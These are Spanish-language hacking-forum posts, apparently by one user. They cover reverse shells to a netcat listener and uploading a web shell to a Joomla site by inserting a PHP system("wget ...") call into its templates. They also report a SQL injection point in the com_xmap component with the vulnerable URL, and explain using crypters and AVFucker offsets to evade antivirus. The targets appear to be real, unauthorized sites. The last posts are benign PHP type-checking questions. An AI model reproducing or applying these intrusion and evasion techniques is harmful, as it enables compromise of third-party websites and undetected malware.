Ese archivo usa el lenguaje PHP si es lo que necesitas saber...

Era problema del firewall, aunque le permití todo, no le dejaria conectarse al 100%, asique tuve que hacerlo con el proceso del firewall eliminado. Gracias de todas formas!

Le doy a registrar y no hace nada, quiza ya hayan quitado la version de prueba

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

Caundo usas el reverse shell apuntas a tu no-ip, dyndns, etc??

Apunto a mi ip directamente, ya que rara vez reinicio el router y casi siempre tengo la misma

he probado con los puertos 888 y 31337 también, aquí te dejo la prueba de que está abierto:



y el netcat lo dejo asi:

Saludos y gracias

gracias, es un tutorial basico pero muy bien explicado.
Una pregunta, por que casi nunca se me conectan los host al netcat? tengo los puertos abiertos y he probado con el comando nc y con el Ncat tambíen, y mu rara vez se me conecta, siempre con el firewall desactivado.
puede ser que el servidor tenga bloqueados los puertos y no puedo usar cualquiera?
Saludos

Gracias por las respuestas, la versión que usa es la 1.5.22. Acabo de intentar meterle passthru en las plantillas, pero al poner index.php=cmd=uname -a no me tira nada, seguire probando haciendo inlude o algun consejo que me digáis...
Saludos

EDIT: ya subí la shell, para los que quieran saber cómo, van a editar plantillas, y meten el comando system: <?php system("wget http:\\shell.txt") ?>
El comando  passthru y exec estaba dessactivado en ese servidor, por eso tuve que usar system()
Saludos

Gracais por el tutorial, ya probe de dos formas, editando las plantilas y poniendo un uploader, y tambien con este método, pero al momento de subir el archivo me tira este error:

CitarNot Acceptable

An appropriate representation of the requested resource /administrator/index.php could not be found on this server.

Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.

Qué podría hacer para solucionarlo? Saludos

Bueno, no se muco sobre linux, esa es mi debilidad, he empezado hace muy poco en seguridad web, por eso, ya que habia encontrado una vulnerabilidad de SQLi queria meterme por ahí, y por eso preguntaba si a alguien le habia pasado algo parecido.

Seguiré buscando por ahí como tu dices Comandante Linux
Un saludo y gracias

Si, probe, pero no hay permisos
Es un servidor bastante protegido, ya que es importante, no es una página cualquiera

Buenas, el otro día me puse a buscar vulnerabilidades a una web basada en joomla, y encontre SLQi en el componente com_xmap,

Citarindex.php?option=com_xmap&tmpl=component&sitemap_id=2&Itemid=999&view='

Al entrar en esa url, da error de MySQL. El problema es que yo inyecto el union y todo eso en la url como en las demas webs, y no puedo conseguir el numero de tablas ni nada.,También le encontré RFI pero tiene la variable Allow_url_include Off

Por ejemplo si yo pongo esto: union+all+select+1,2,3,4,5## ,me tira este error:


Si alguien está dispuesto a ayudarme, le puedo pasar la url por MP

Gracias, un saludo, Er kali

Buenas,

Respondiendo a tu primera pregunta, hay dos tipos de crypters, los scantime y los runtime
Los runtime, al ejecutar el server, se desencrypta en memoria, éstos son los mas usados y mejores
Los scantime solo te van a hacer indetectable el server al pasar el antivirus con el click derecho, pero el ejecutar el server encryptado, éste se va desencryptar y va a copiar el serer original en una carpeta temporal, y ahí el antivirus te lo va a detectar.

Si quieres una explicacion mas detallada de como funciona cada crypter, busca algun tutorial por ahi, que los hay.

A la segunda pregunta: El nombre del offset que tienes que saber son los que te deja sin detectar en la carpeta donde hiziste el AVFucker, normalmente llamada "temp". Analiza esa carpeta y borra todo lo que te detecte, y los archivos que queden sin detectar, pues esos son los offsets indetectables

Saludos espero haberte ayudado 

Ahora si, gracias a los dos, no me acurdaba de la función is_numeric 
Saludos ya pueden cerrar el tema si quieren

Si pero yo no quiero cambiar el tipo de variable, sino saber que tipo es, según lo que el usuario escriba en el campo de texto.
Alomejor en php no se puede hacer, de php se lo básico
He buscado en google y tampoco he encontrado nada
Saludos

Creo que no me he explicado bien. lo que quiero hacer es esto:

<form action="" method="POST"> 
Introduce lo que quieras: <input type="text" name="msg" /><br><br>
<input type="submit" name="boton" value="Enviar" />
</form>

<?php
$msg = $_POST['msg'];
if(is_int($msg)){
	echo 'Ahora tiene un numero mas'.++$msg;
	}
?>

Pero claro, siempre devuelve tipo string, entonces aunque solo introduzcas en el campo de texto números, no te lo va a evaluar como integer, entonces me preguntaba como solucionarlo
Saludos y gracias contestar rápido

Buenas, estoy haciendo el último ejercicio y quería saber como obtener el tipo de variable introducida en un label de un formulario, porque obteniendolo normalmente con gettype siempre da string,, ya que esta en una variable entrre comillas digamos.
Saludos